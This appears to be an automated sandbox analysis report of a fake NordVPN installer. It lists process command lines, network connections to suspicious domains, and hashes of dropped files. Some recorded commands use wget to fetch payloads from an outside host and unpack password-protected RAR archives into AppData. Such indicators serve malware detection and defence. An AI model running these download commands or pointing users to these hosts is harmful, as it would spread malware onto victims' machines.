"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin20718
C:\Users\Admin\AppData\Roaming\services\2plugin20718
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\3plugin16826
C:\Users\Admin\AppData\Roaming\services\3plugin16826
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1176
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap8338:88:7zEvent13711
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| N/A | 127.0.0.1:51483 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 52.25.97.240:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | 240.97.25.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:51489 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.186.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.186.68:443 | www.google.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | 68.186.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 67.185.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.184.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vpngets.com | udp |
| US | 172.67.131.227:80 | vpngets.com | tcp |
| US | 172.67.131.227:80 | vpngets.com | tcp |
| US | 8.8.8.8:53 | vpngets.com | udp |
| US | 8.8.8.8:53 | vpngets.com | udp |
| US | 172.67.131.227:443 | vpngets.com | tcp |
| US | 172.67.131.227:443 | vpngets.com | udp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| DE | 162.55.188.142:443 | neo.tildacdn.com | tcp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| US | 8.8.8.8:53 | 227.131.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.185.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.188.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stat.tildacdn.com | udp |
| GB | 193.3.17.198:443 | stat.tildacdn.com | tcp |
| US | 8.8.8.8:53 | stat.tildacdn.com | udp |
| US | 8.8.8.8:53 | stat.tildacdn.com | udp |
| US | 8.8.8.8:53 | 198.17.3.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.28.226:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | s3-w.us-east-1.amazonaws.com | udp |
| US | 8.8.8.8:53 | s3-w.us-east-1.amazonaws.com | udp |
| US | 3.5.28.226:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 226.28.5.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s3-w.us-east-1.amazonaws.com | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.28.226:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | stat.tildacdn.com | udp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| US | 8.8.8.8:53 | voloz.site | udp |
| US | 172.67.145.170:443 | voloz.site | tcp |
| US | 8.8.8.8:53 | voloz.site | udp |
| US | 8.8.8.8:53 | voloz.site | udp |
| US | 8.8.8.8:53 | 170.145.67.172.in-addr.arpa | udp |
| US | 172.67.145.170:443 | voloz.site | udp |
| US | 8.8.8.8:53 | vpnsget.pw | udp |
| US | 8.8.8.8:53 | vpnsget.pw | udp |
| US | 172.67.165.66:443 | vpnsget.pw | tcp |
| US | 8.8.8.8:53 | vpnsget.pw | udp |
| US | 8.8.8.8:53 | 66.165.67.172.in-addr.arpa | udp |
| US | 172.67.165.66:443 | vpnsget.pw | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\ab8cdac4-8a8f-4c93-8d2f-7d03ffd575d4
| MD5 | fb403e3808249a0ef5d50d1108f9770b |
| SHA1 | 09c96d890347b6ab12dc250a2764baeef8e703f7 |
| SHA256 | f8673694373c1631e2612e2fc05ad0099fad9a49286f0c43a3344f1eb80a6c83 |
| SHA512 | d1ce8473cfa30edc0804ed30ae5b5eba24f8d13910f41cb7011ab3b502fee63253371921768b6561584292f4c91cd27d64bc95314f6a800f52e70afe6a34b307 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\efeb1311-ca69-4ea6-b522-9dc391810200
| MD5 | 23d75d5683d0d770da46ba9c7b518818 |
| SHA1 | 54102604312975c92706242ec9ef060947becfd9 |
| SHA256 | 2bf63a115c0e147279e6e32796bf6a24315a6305041c5ce888ac9a73301daef1 |
| SHA512 | 5a37df93a89144250edeb039721f60c0fe383479ae112c0dda2a430aaeac9ea0aed0fe6b5a34ae6efa83d956ce000ba5b861a81546ff9d1aa4dacc8bf42006fa |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\db\data.safe.bin
| MD5 | f05f543617b8face46542d646c55b6d1 |
| SHA1 | 31a0b7e87707eb1361ecb4bc6f0152a955c4b973 |
| SHA256 | ae11567b65bea21ccc814cfec8fcba1109207a4eff99d3fc84ff551c3749645d |
| SHA512 | 27aac929a3cd91baec3af5643b89e7903a75ef8044f91c29b471660b26d3e35fbafd2d7c4e3e8985a8a0262818943a23e4ce35bcd94cf1989d018d771ba3e1a0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs-1.js
| MD5 | 1008a57a9212174c182b3793c3fec936 |
| SHA1 | ef60d8b64148df6f11fb80f33f00352c4ec63489 |
| SHA256 | 7b3810d2df381c9ecc386e495e4d2dacf98edcffec141fefdf14ef9e1a330b64 |
| SHA512 | a2562c4d8b6e75193c109a128fa4c58f09bda8a93feacdcc782571067c5bf09164fb76b76ca76ee48ff79b5dd9fa43b4b97236bf8c78002d23358d1efb76c80a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 6909468c9f43c288423627fdd7cd5470 |
| SHA1 | 393d01e5cd85d4a622e2cda5c01aaceaa1edacf1 |
| SHA256 | f6c27baddbd79ef5c502740a766b79ab1a268807ca75f2f39f9fb2620d8efbe6 |
| SHA512 | 8aa7ba379e24c801c25b09152c70c42c877cb0c0fa6d7502fc34d8203729af37bfef488f3bbf407a24710eabd06b8811fae0381b1dc5a0cbde675b77a7605926 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 1639e98f6397aed6f1f6cf6a89c20748 |
| SHA1 | 1879bb1a689b482a9b8d1e0fc0c19d5f9416d702 |
| SHA256 | 584456e5d5de4ee42642463c4487b10309545ce2c75f14990c5437b1b2aabdd1 |
| SHA512 | 9d9c7d96b05d006312a07ffce188ccab74c540904d25f10044ce23078ec0f75184ce18dc0d4876f54c95c27428881fdbf79956dfc1205ab1776fb14209731f0b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 69a8226367e9975efcaaf037c6dc1d07 |
| SHA1 | ca3d47439ecd6781f23423e3b3973be06a9e07d1 |
| SHA256 | 1d733f1d4f2c4919f0064552d6f0e2edefa41bd1b4c6ee1d3b22e52f9517196d |
| SHA512 | b08af08ec931c62254dbb70d751ddc4e74d7f250a68c5eadce8e7cd2317076c49a6e7cf7e62c3dbdff9980a2068cd0cc0c36eb4a93cf01a27776f940ba563956 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\gaix9yhh.default-release\thumbnails\49c6eaf24c972ce4720459699ad41679.png
| MD5 | 76197863ae28765b85face61d51e8309 |
| SHA1 | 57f2e2fb95137aa89326679cb733541253093be8 |
| SHA256 | 28076a9d77b31f0047d40540d98f85dcb2481eaa516cff0291012254355a856f |
| SHA512 | 5a5da73028b2af59b15b820edddc603543615b8a266d4facc36ce475a455befa291f0989f2b283e2ecb8aa7ad199d1cfea65ae90536f403cc43dcad7a50a5679 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 0cfbf43267c6264d825234e78b0d683f |
| SHA1 | 98e071c20b2e065b256b1f85ce0d8983ba8df464 |
| SHA256 | eac65b2c7459ce8a38458e9767a1b44f2056e314c08ad1220896c09d2f8afc32 |
| SHA512 | f89fc31fa161e7d24c54b352a44e740a6284e235516f42d96bad6707c7ee0062699eed30045ef06f90dc2bdb6d0d18a0d9da4cc69385a35aea062fcfbda80664 |
C:\Users\Admin\Downloads\NordVPN-10_11.g2vukrUZ.zip.part
| MD5 | dc4f1a240f8a940977284ce77f876439 |
| SHA1 | 6b013a62e9d0d511256f69abc4ded33c7f291772 |
| SHA256 | 3f80c20fecafcfa264532eae938edb81dd04c8d0335c366f0b3c4c64ad529967 |
| SHA512 | f92f00734f19c669c26febe8e227d7a2f3f23b901e21c9a9ec19ad9e4aac9863c9ef32f03b8d646ec4a4e1d67769d833012698c0d720a049f0c9af342d3f29c1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs.js
| MD5 | e29ab0d2aa826448bfb09679b6872a4a |
| SHA1 | 22216ffd94871730bdd0239136d175d8c9a726d2 |
| SHA256 | 9248cf38e788be8a0f998ae84441f199fc5785127872bde784a4458df2f0d4e4 |
| SHA512 | 8147a2582ca0a8da71f096fbdb040607fd3f2c56e8c7c7686f58862d44425124ca2715b0984509aaf8802a569d8320d6cb72bf6d7a03f0ecd03cf2db5b6cfb33 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 965adcaec10c82840e217cf82bd83422 |
| SHA1 | ca82b0dcc8023ff30c84a0962480f3e22d573ae2 |
| SHA256 | 3d389c8ef6f58d1b44f17f491b49b398ac24710d55b7e2773ac8f5b31544fa70 |
| SHA512 | f316414c15d38b0af00d4aebc5e5e9dff3f837baeb8b98cc0e5417e4031db43d93bbb505cdc36d04b8a804dd15dea61383d9789ad9f22cddd4041450a2225d34 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 446fca81f3127bb659ef84813c02a5e0 |
| SHA1 | 0a1818f315efc19a9e8e1ba1420ef434f4fbfe15 |
| SHA256 | cf3a1aad00a2216474d0ce7e5e63a43cc1c2d41e2d15263a0bfafa2ae9f701bc |
| SHA512 | 611de8be487e8592205eea520ea19923acf2ba18e59ba37985e4a1ee6592aa0bf9fd14daabf8cac1f44bd3b29494f3513ad2c85c7bfdd43bea0a7d79a19f70f1 |
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
| MD5 | 93fde4e38a84c83af842f73b176ab8dc |
| SHA1 | e8c55cc160a0a94e404f544b22e38511b9d71da8 |
| SHA256 | fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03 |
| SHA512 | 48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec |
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.dll
| MD5 | 32e7556ff4f5256d15e1fc843cee5e3d |
| SHA1 | b7283061428e9ca741c26dcfc3e869e2fc699f0b |
| SHA256 | b2f5dfcba2018e9b4314c245f6391783bd3717fe02fec3e6edf1b9d1a3801278 |
| SHA512 | d39ca3fd8edb7db7e19655ea3aa69d8b0a4008514ed356808b59f7cdf4c109b7efd0ed54f6ea099d37b33f107f234adc4f01a178c90961e88d3c9ed7a8ebe40e |
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\WinRAR.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\Downloads\NordVPN-10_11\data\AppInfo\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
memory/2392-4392-0x00000000737A0000-0x0000000073F50000-memory.dmp
memory/2392-4393-0x0000000004A20000-0x0000000004A30000-memory.dmp
memory/2392-4394-0x0000000004910000-0x0000000004946000-memory.dmp
memory/2392-4395-0x0000000005060000-0x0000000005688000-memory.dmp
memory/2392-4396-0x0000000005030000-0x0000000005052000-memory.dmp
memory/2392-4397-0x0000000005800000-0x0000000005866000-memory.dmp
memory/2392-4398-0x0000000005870000-0x00000000058D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fpww0w0r.3rh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2392-4408-0x00000000058E0000-0x0000000005C34000-memory.dmp
memory/2392-4409-0x0000000005F80000-0x0000000005F9E000-memory.dmp
memory/2392-4410-0x0000000005FC0000-0x000000000600C000-memory.dmp
memory/2392-4411-0x0000000004A20000-0x0000000004A30000-memory.dmp
memory/2392-4412-0x0000000006F60000-0x0000000006FF6000-memory.dmp
memory/2392-4413-0x00000000064B0000-0x00000000064CA000-memory.dmp
memory/2392-4414-0x0000000006500000-0x0000000006522000-memory.dmp
memory/2392-4415-0x0000000007600000-0x0000000007BA4000-memory.dmp
memory/4808-4420-0x00000000737A0000-0x0000000073F50000-memory.dmp
memory/4808-4421-0x0000000002F60000-0x0000000002F70000-memory.dmp
memory/4808-4422-0x0000000002F60000-0x0000000002F70000-memory.dmp
memory/4808-4434-0x0000000002F60000-0x0000000002F70000-memory.dmp
memory/2392-4435-0x00000000737A0000-0x0000000073F50000-memory.dmp
memory/4808-4437-0x00000000700E0000-0x000000007012C000-memory.dmp
memory/4808-4436-0x0000000007940000-0x0000000007972000-memory.dmp
memory/4808-4447-0x0000000006CE0000-0x0000000006CFE000-memory.dmp
memory/4808-4448-0x0000000007980000-0x0000000007A23000-memory.dmp
memory/4808-4449-0x00000000080F0000-0x000000000876A000-memory.dmp
memory/4808-4450-0x0000000007B20000-0x0000000007B2A000-memory.dmp
memory/4808-4451-0x0000000007CA0000-0x0000000007CB1000-memory.dmp
memory/4808-4452-0x0000000007CE0000-0x0000000007CEE000-memory.dmp
memory/4808-4453-0x0000000007CF0000-0x0000000007D04000-memory.dmp
memory/4808-4454-0x0000000007D30000-0x0000000007D4A000-memory.dmp
memory/4808-4455-0x0000000007D20000-0x0000000007D28000-memory.dmp
memory/4808-4458-0x00000000737A0000-0x0000000073F50000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2392-4464-0x0000000004A20000-0x0000000004A30000-memory.dmp
memory/1800-4468-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/2392-4472-0x0000000004A20000-0x0000000004A30000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\01plugins16318.rar
| MD5 | e5e2d68307b34f409a92ef7669837322 |
| SHA1 | ee6cf43a96cac8e36f8b8dd06c826d428063f1d5 |
| SHA256 | d4032168bf6b6de3d4f936c03d947fe6524ced7cca91bbc2134bbf8fbc834cce |
| SHA512 | b9ed94940194dcdddab7230db7d6ccf527e5bff4c9f822a553430f19d0f172a5d4fe1052a69ca19afd394f52ee9953a0f61afaf3447bd927b3b94114e505b2c5 |
C:\Users\Admin\AppData\Roaming\services\plugin16904
| MD5 | c233a13f928f3d16c08b4ce9231dd11e |
| SHA1 | 01f011955763cd6b25d8c2b463c42d2339807737 |
| SHA256 | bceda9a1bbaa1b5e4353c64f7a95fc00e757872cbfc67f2ee1aa2f501c7a0ae0 |
| SHA512 | 6e6192e46b3089e7fa3d320a5457a023cf210f4a2fb41378f9a9c84aacd7c1f5f7efdbfc6b322a7f2e7916b9a18961cd320fd49f24a9ac1448ae56cd426e5ba5 |
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
| MD5 | 249e2716b9617321571ec649761b6c55 |
| SHA1 | 9aa9ce93d585744b92c3a66f70b84cd0965ac2cb |
| SHA256 | d0ba8b6245274e17cd9fabb2d9eb654d9a9db39a7c494c8eb3339e03fde9b988 |
| SHA512 | ea2d7f3fd57d14039a1c1ebb824a870efd8e765e13f126ee742e0a73a3bde832ab6f6e36a41d77f381a33a86af4e16c14e4be12abf259592bdc8e2bfa3731b10 |
memory/3700-4484-0x0000000000820000-0x0000000000920000-memory.dmp
memory/3700-4485-0x00000000021D0000-0x000000000222A000-memory.dmp
memory/3700-4486-0x0000000000400000-0x000000000056A000-memory.dmp
memory/3700-4487-0x0000000003400000-0x0000000003800000-memory.dmp
memory/3700-4488-0x0000000003400000-0x0000000003800000-memory.dmp
memory/3700-4489-0x0000000003400000-0x0000000003800000-memory.dmp
memory/3700-4491-0x0000000003400000-0x0000000003800000-memory.dmp
memory/3700-4490-0x00007FFF0CD30000-0x00007FFF0CF25000-memory.dmp
memory/3700-4493-0x00000000774A0000-0x00000000776B5000-memory.dmp
memory/5772-4494-0x0000000000130000-0x0000000000139000-memory.dmp
memory/5772-4496-0x0000000001E80000-0x0000000002280000-memory.dmp
memory/5772-4497-0x0000000001E80000-0x0000000002280000-memory.dmp
memory/5772-4500-0x0000000001E80000-0x0000000002280000-memory.dmp
memory/5772-4501-0x00000000774A0000-0x00000000776B5000-memory.dmp
memory/3700-4502-0x0000000000400000-0x000000000056A000-memory.dmp
memory/3700-4503-0x00000000021D0000-0x000000000222A000-memory.dmp
memory/3700-4504-0x0000000003400000-0x0000000003800000-memory.dmp
memory/5772-4498-0x00007FFF0CD30000-0x00007FFF0CF25000-memory.dmp
memory/5772-4505-0x0000000001E80000-0x0000000002280000-memory.dmp
memory/5192-4508-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
| MD5 | 5e4bed1f03eaf955f34fb7aac08e1ea9 |
| SHA1 | 25995351caff180c6054845dbb065ad15c35f502 |
| SHA256 | d24273e54ee82454ed6a49fad5c3e6ff593121ed45ebb6a88b7b36de994e67af |
| SHA512 | e06a0b7be4941d9790455b71350fba0dc5cda3c18c61bd3d365da986a92585e42d57a0d723b6aef19c1c173208cd310b74096b77aaea8aa1590e4a33e848b9bb |
C:\Users\Admin\AppData\Roaming\services\02plugins22289.rar
| MD5 | 72aa5a9a19666e3a55e01e1d601c427e |
| SHA1 | 568a2a9d127b3c36723c5a906c0558862a64f2ae |
| SHA256 | 8ff970c1c22841e952b43f4d3cb8c1eb5e950d8d07a6f3d63d9ed02decd81492 |
| SHA512 | e5d23c418286b065f3e17af6b32eaa7140d22f7c78e9e564702a4c9bb34d7fd8480409217133c682aa0b30d59bdb4743feb0774330e5d9219276fa52af206f3e |
C:\Users\Admin\AppData\Roaming\services\2plugin20718
| MD5 | 098f0b6b6cfa12d01ee4c84aeb790a0e |
| SHA1 | 15c4be833af1c5ec6eae1cc9e860de30fb625895 |
| SHA256 | 21c8a15270b17d16ed2bfb0b0522a59515c1991ccb4489cc374edb884dddc6b5 |
| SHA512 | 882633c26faf013036bcaa756d2c8ff45b5826d5c9e2cf7e679ca4df25ac00b1b563e88375f05ae1f86b41becd5af9385ce345bbb12f4d3d1dc2e21e66a3a8c6 |
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
| MD5 | 221a8c261f9722171aee46f3cbc4c268 |
| SHA1 | 02c211e3f4d547fddb1e3a375892198e485ee41d |
| SHA256 | bf3b7fbb8af24192c830d43bf157f40c12dbe86bce239742fce9af712f6c0630 |
